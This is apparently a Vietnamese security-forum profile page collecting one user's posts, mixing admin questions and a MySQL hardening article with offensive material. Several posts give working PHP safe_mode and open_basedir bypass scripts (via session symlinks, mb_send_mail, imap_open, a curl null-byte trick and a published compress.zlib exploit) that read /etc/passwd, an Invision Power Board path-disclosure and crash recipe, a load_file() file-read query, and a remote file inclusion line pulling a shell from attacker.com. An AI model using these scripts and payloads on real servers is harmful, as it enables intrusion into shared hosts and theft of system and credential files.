banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: baothu  XML
Profile for baothu Messages posted by baothu [ number of posts not being displayed on this page: 6 ]
 
bạn dựa vào đâu để nói security của window là rất kém ? Nếu sec của win kém thì microsoft.com đã ra đi lâu rồi
PHP ko nhất thiết phải chạy trên nix .Nếu như Sysadmin ko quan tâm đến bảo mật thì chạy trên OS nào cũng vô dụng
phần upload có vấn đề
hoàn toàn up shell và hack được
bạn nên nhờ coder write lại phần upload và adminCP ,có nhiều file cho access vô tư
phần bug ko tiện pót ở đây
nếu muốn mình PM link error cho bạn qua hệ thống PM của forum
thân
mod security dùng cho Apache trên linux ,chưa có bản dành cho window đâu bạn à
trong linux có lệnh ln để tạo symlink và hard link,trong windows cũng có chức năng shorcut tương tự.Ở đây em muốn hỏi có cách nào tạo shorcut bằng command của DOS ko,bác nào biết thì giúp em phát smilie
không hiểu anh seamon sao chứ em dùng metasploit test trên lan thì okies,nhưng remote thì thất bại hoài
Sorry,dont know authors smilie)
Description:
A vulnerability has been reported in Invision Power Board, which can be exploited by malicious people to disclose path of IPB Forum.


http://site.com/IPB/sources/acp_loaders/acp_pages_components.php
http://site.com/IPB/sources/classes/bbcode/class_bbcode.php
http://site.com/IPB/sources/classes/bbcode/class_bbcode_legacy.php
http://site.com/IPB/sources/classes/editor/class_editor_rte.php
http://site.com/IPB/sources/classes/editor/class_editor_std.php
http://site.com/IPB/sources/classes/post/class_post_edit.php
http://site.com/IPB/sources/classes/post/class_post_new.php
http://site.com/IPB/sources/classes/post/class_post_reply.php
http://site.com/IPB/sources/loginauth/convert/auth.php
http://site.com/IPB/sources/loginauth/external/auth.php
http://site.com/IPB/sources/loginauth/internal/auth.php
http://site.com/IPB/sources/loginauth/ldap/auth.php
http://site.com/IPB/sources/sql/mysql_subsm_queries.php
http://site.com/IPB/sources/sql/mysql_queries.php
http://site.com/IPB/sources/sql/mysql_extra_queries.php
http://site.com/IPB/sources/sql/mysql_admin_queries.php

Fatal error: Class 'class_post' not found in /home/home_user/public_html/sources/classes/post/class_post_new.php on line 28
 




http://forums.site.com/index.php?showtopic=1&&st[]=

Fatal error: Unsupported operand types in /home/forumpublic_html/sources/ipsclass.php on line 3025
 



1) Post a new topic.

Content of new topic without wrapping quotes:
Code:
"[quote x='xxxxx'][/quote"

Post.

Click Reply to reply to the post you just posted. (tongue twister?)

Result:

Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 32 bytes) in /****/**/***/*****/forums/sources/classes/post/class_post.php on line 2265

2) Post a new topic.

Content of new topic without quotes:
Code:
"[quote][/quote"

Post.

Click Reply to reply to the post you just posted. (tongue twister?)

Result:

Server Error.

Note: If you do not have show errors set to ON you will get either a Server Error or a Network Error.
 
Mýql như chúng ta đã biết là một DBMS rất phổ biến ,chung quy chia ra làm 4 loại:
* MySQL Standard includes the standard storage engine, as well as the InnoDB storage engine, which is touted as a “transaction-safe, ACID-compliant database” with some additional features over the standard version.
* MySQL Pro is the commercial version.
* MySQL Max includes the more technologically advanced features that are available during early access programs.
* MySQL Classic is the standard storage engine without the InnoDB engine. This is another commercial version. 

Đội ngũ phát triển Mysql vì muốn nâng cao khả năng tiện dụng của mysql mà đã đưa thêm một số function có nguy cơ tìm tàng đối với vấn đề bảo mật của server .
Chúng ta hẳn đã nghe nói đến hình thức local qua mysql ?.Xem thử một ví dụ như sau :
(giả định attacker có một mysql user có quyền tạo ,chỉnh sửa, thêm xoá DB trên sever )
Code:
use atttacker;
Create table readfile(text LONGTEXT);
Insert into readfile values(loadfile('/etc/passwd');

Result:
Select * from readfile; 

Code:
rootsmilie:0:0:root:/root:/bin/bash
binsmilie:1:1:bin:/bin:/sbin/nologin
daemonsmilie:2:2:daemon:/sbin:/sbin/nologin
admsmilie:3:4:adm:/var/adm:/sbin/nologin
lpsmilie:4:7:lp:/var/spool/lpd:/sbin/nologin
syncsmilie:5:0:sync:/sbin:/bin/sync
shutdownsmilie:6:0:shutdown:/sbin:/sbin/shutdown
haltsmilie:7:0:halt:/sbin:/sbin/halt
mailsmilie:8:12:mail:/var/spool/mail:/sbin/nologin
newssmilie:9:13:news:/etc/news:
uucpsmilie:10:14:uucp:/var/spool/uucp:/sbin/nologin
operatorsmilie:11:0:operator:/root:/sbin/nologin
gamessmilie:12:100:games:/usr/games:/sbin/nologin
gophersmilie:13:30:gopher:/var/gopher:/sbin/nologin
ftpsmilie:14:50:FTP User:/var/ftp:/sbin/nologin
nobodysmilie:99:99:Nobody:/:/sbin/nologin
vcsasmilie:69:69:virtual console memory owner:/dev:/sbin/nologin
rpmsmilie:37:37::/var/lib/rpm:/sbin/nologin
netdumpsmilie:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscdsmilie:28:28:NSCD Daemon:/:/sbin/nologin
identsmilie:100:101::/home/ident:/sbin/nologin
sshdsmilie:74:74smilierivilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcsmilie:32:32smilieortmapper RPC user:/:/sbin/nologin
mailnullsmilie:47:47::/var/spool/mqueue:/sbin/nologin
smmspsmilie:51:51::/var/spool/mqueue:/sbin/nologin
pcapsmilie:77:77::/var/arpwatch:/sbin/nologin
xfssmilie:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
cannasmilie:39:39:Canna Service User:/var/lib/canna:/sbin/nologin
wnnsmilie:49:49:Wnn Input Server:/var/lib/wnn:/sbin/nologin
mysqlsmilie:101:102:MySQL server:/var/lib/mysql:/bin/bash
namedsmilie:25:25:Named:/var/named:/sbin/nologin

Một số bạn tự hỏi rằng : Quái? Sao server được hardening cẩn thận rồi ,php : safe_mod on ,đã set open_basedir ,disable function tá lả mà nó vẫn local được ? .Rất có thể admin quản trị server đã bỏ quên ,chưa chăm sóc đến anh chàng mysql này. Vậy vấn đề của chúng ta là tìm ra các nguy cơ từ tính tiện dụng của mysql , đứng ở góc nhìn của customer (đặt trường hợp bạn quản trị một server cung cấp shared host) xem họ có cần thiết phải sử dụng các chức năng đó hay ko ,và Attacker sẽ làm gì khi họ có được một mysql user ,sau đó ta sẽ triển khai giải pháp hạn chế ,ngăn ngừa nguy cơ này.
Ta hãy xem xét qua các function của mysql . Vậy trong các function này ,cái nào có nguy cơ bảo mật nhất ?
Mysql có 3 hàm có khả năng thao tác file là load_file() ,load data infile và dumpfile.
Trước tiên hãy xem qua hàm load_file();
Hàm này có cú pháp như sau :
LOAD_FILE(file_name)  

Công dụng của hàm này là đọc và trả về giá trị của file như một chuỗi . Xem manual page của mysql ,bạn sẽ thấy hàm này cần vài điều kiện để có thể thực thi
To use this function, the file must be located on the server host, you must specify the full pathname to the file, and you must have the FILE privilege. The file must be readable by all and its size less than max_allowed_packet bytes.
 

Đầu tiên ,user (mysql) phải có File Privilege ,kế đến fiel này phải readable by all. Đây là 2 chìa khoá để ta chốt cổng ,không cho attacker chui vào smilie) . Hãy đặt mình dưới góc độ của một customer thuê host bình thường ,khi họ muốn thao tác file có thể xảy ra 2 trường hợp :
1 dùng php or perl ,cgi ,asp để manipulate
2 là dùng Ftp để chỉnh sửa trực tiếp
Vậy thì File privilege hoàn toàn không cần thiết cho một user bình thường sử dụng .Để ngăn chặn nguy cơ từ hàm load_file() này ,bạn đơn giản chỉ việc disable file privilege của toàn bộ user trong mysql .
Kế đến ta xem xét tiếp chức năng load data infile;
Hàm này có cú pháp như sau :
LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE 'file_name'
[REPLACE | IGNORE]
INTO TABLE tbl_name
[FIELDS
[TERMINATED BY 'string']
[[OPTIONALLY] ENCLOSED BY 'char']
[ESCAPED BY 'char']
]
[LINES
[STARTING BY 'string']
[TERMINATED BY 'string']
]
[IGNORE number LINES]
[(col_name,...)]
 

(bài viết này giả định bạn đã có kiến thức về mysql ,ở đây ta ko bàn đến cú pháp hay cách dùng hàm)
Hàm này cũng có công dụng tương tự load_file() nhưng run với tốc độ khá nhanh . Ngoài ra còn có thêm từ khoá "Local" .Trong trường hợp từ khóa local được thêm vào query . Mysql sẽ đọc file trên client và gửi nó về server. Đa số server hiện nay đều set trên localhost nên việc có hay ko local cũng ko quan trọng lắm .Hãy xem sơ qua điều kiện để hàm này có thể thi hành :
For security reasons, when reading text files located on the server, the files must either reside in the database directory or be readable by all. Also, to use LOAD DATA INFILE on server files, you must have the FILE privilege 

Vẫn chiếc chìa khoá vàng File privilege ,bạn có thể ngăn chặn được khả năng readfile từ mysql .
Việc dumpfile hiếm server nào cho phép nên ta không bàn tới
Kết luận :
Mysql là một DBMS thực sự mạnh mẽ vì tính tiện dụng và sức mạnh của nó nhưng vì một số hàm tiện dụng quá lại trở thành mối nguy cơ tiềm tàng cho attacker lợi dụng . Hy vọng sau bài viết nho nhỏ này ,bạn có thể nâng cao mức bảo mật của hệ thống .Các thiếu sót mong được mọi người góp ý
thân
Init set,chưa test

1) Make the following script:
<?php
ini_set("session.save_path","/path/where/sess_foo/symlink/is/");
session_start();
$_SESSION['bar'] = "bar";
session_write_close();
?>
2) Call this script with ?PHPSESSID=foo
 
Còn đây là mb_sendmail

<?php
$rek= "hehehehe";
if (file_exists($rek)) unlink($rek);
$file = "/etc/passwd";
$xploit = "-C ".$file." -X ".getcwd()."/".$rek;
mb_send_mail(NULL, NULL, NULL, NULL, $xploit);
echo "<pre>".file_get_contents($file)."</pre>";
?>
 
Cái nè ByPass cũng cool nì,qua Imap Function
Code:
<form action="" method="post">
<select name="switch">
<option selected="selected" value="file">View file</option>
<option value="dir">View dir</option>
</select>
<input type="text" size="60" name="string">
<input type="submit" value="go">
</form>
<?php
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
if ($string && $switch == "file") {
$stream = imap_open($string, "", "");
if ($stream == FALSE)
die("Can't open imap stream");
$str = imap_body($stream, 1);
if (!empty($str))
echo "<pre>".$str."</pre>";
imap_close($stream);
} elseif ($string && $switch == "dir") {
$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
die("Can't open imap stream");
$string = explode("|",$string);
if (count($string) > 1)
$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
else
$dir_list = imap_list($stream, trim($string[0]), "*");
echo "<pre>";
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]\n";
echo "</pre>";
imap_close($stream);
}
?>
nữa nè,qua CURL
Code:
<?
$ch =
curl_init("file:///etc/passwd\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
bài này có lâu rồi,nhưng thấy còn dùng được nên post lên đây cho mọi người tham khảo

Code:
<?php
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
by Maksymilian Arciemowicz SecurityReason.Com
cxib [at] securityreason [dot] com and max [at] jestsuper [dot] pl
pozdro sp3x
*/
$file=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
echo "<PRE>\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like
?file=/etc/passwd\n <B><CENTER><FONT
COLOR=\"RED\">SecurityReason.Com
Exploit</FONT></CENTER></B>");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "<B>--- Start File ".htmlspecialchars($file)."
-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\n<FONT COLOR=\"RED\"><B>File
".htmlspecialchars($file)." has been already loaded. SecurityReason Team
;]</B></FONT>");
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}
?>
em nghĩ hàm sendto chỉ giành cho UDP socket thui,vẫn sài cho TCP socket dc à

Z0rr0 wrote:

Quan Vân Trường wrote:

Ý anh conmale là thế này:
Vd:
Web root là "C:\Inetpub\wwwroot\" thì ta đặt *.mdb ra khỏi folder đấy (vd đặt vào "C:\Data\" .v.v.). Khi đấy "googlebots" sẽ ko tìm thấy được.

Thân. 


Về quan điểm security toàn vẹn anh nghĩ các db quan trọng cũng tránh để cùng server với web server, vì nếu web server bị exploit local thì để chổ nào trong server đó cũng chết smilie)
Tốt hơn (more harden) nên để ở một db server được bảo vệ nhiều tầng, rồi từ web server mà connect vào. 

vậy nếu web server bị expl ,thì việc connect vào db cũng ko khó chứ anh,vì mình có dc info để connect rồi mà smilie
Theo mình host bảo mật nhất có lẽ là yahoo và 1and1,bluehost vẫn có người bypasss dc

ps:nếu bạn ko biết source của victim ,và victim cũng ko bị path diclosure (có nghĩa là bạn chỉ bit nó bị include và ko biết đc sau biến $mkdir là biến config.php thì làm sao rename file backdoor trên host hacker là config.php để làm giả cái path cho hợp lý đây ?? chả nhẽ pó tay ? )
 

nếu biết viến $mkdir bị bug thì vẫn có thể biết dc đằng sau nó là cái j mà anh
site.com/file.php?mkdir=aa
Nếu display error=On thì nó tự show ra thui,còn ko thì có thể thêm dấu ? vào để khắc phục
site.com/file.php?mkdir=http://attacker.com/shell.txt?
smilie

buicathung wrote:

baothu wrote:
bác nè cúng ý tưởng với em,đổi tên biến chứa info truy cập vào mysql và Zend toàn bộ source.Xong,attacker pó chiếu smilie 


smilie cũng chưa hẳn bó chiếu vì nếu như attacker nếu có thể view được source của bạn(local) thì khả năng vẫn là cao. Thì thực ra trên biến là khác nhưng vị trí của nó thì vẫn ở đó thôi. Cái này nói gì thì nói cũng chỉ đánh lừa được những tay mơ. Chỉ có thể giảm thôi chứ ko thể tránh được hoàn toàn smilie  


view source nhưng Zend hết rồi thì làm seo :lolsmilie
bác nè cúng ý tưởng với em,đổi tên biến chứa info truy cập vào mysql và Zend toàn bộ source.Xong,attacker pó chiếu smilie
Hey,sorry các bạn mình làm dc rồi smilie
http://dev.mysql.com/doc/refman/5.0/en/old-client.html
Apache 2.0.58,mysql 5.0.22,php 4.4.2.Connect vao mýql sever thong qua MySql admin thì okie nhwugn kết nối vào database bằng code php thì ko dc (cài đặt Vbb trên localhost).Đây là lỗi

Step 2) Connect to the database

Attempting to attach to database

Error description: mysql_connect(): Client does not support authentication protocol requested by server; consider upgrading MySQL client E:\www\docs\vbb\includes\class_core.php on line 279

The database has failed to connect because you do not have permission to connect to the server. Please confirm the values entered in the 'includes/config.php' file.
 

search trên mysql (Client does not support authentication protocol requested by server; consider upgrading MySQL client E:\www\docs\vbb\includes\class_core.php on line 279) thấy nó bảo phải có mysql connector,down và copy 2 file php_mysql.dll, libmysql.dll vào tron thư mục cài đặt php rồi (mặc định extention là ./ mà) nhưng vẫn bị lỗi trên.Ai giúp tui dc hông,pó tay rồi
http://www.nis.com.vn/securitytraining/softsupport/
 
Go to Page:  First Page Page 1

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|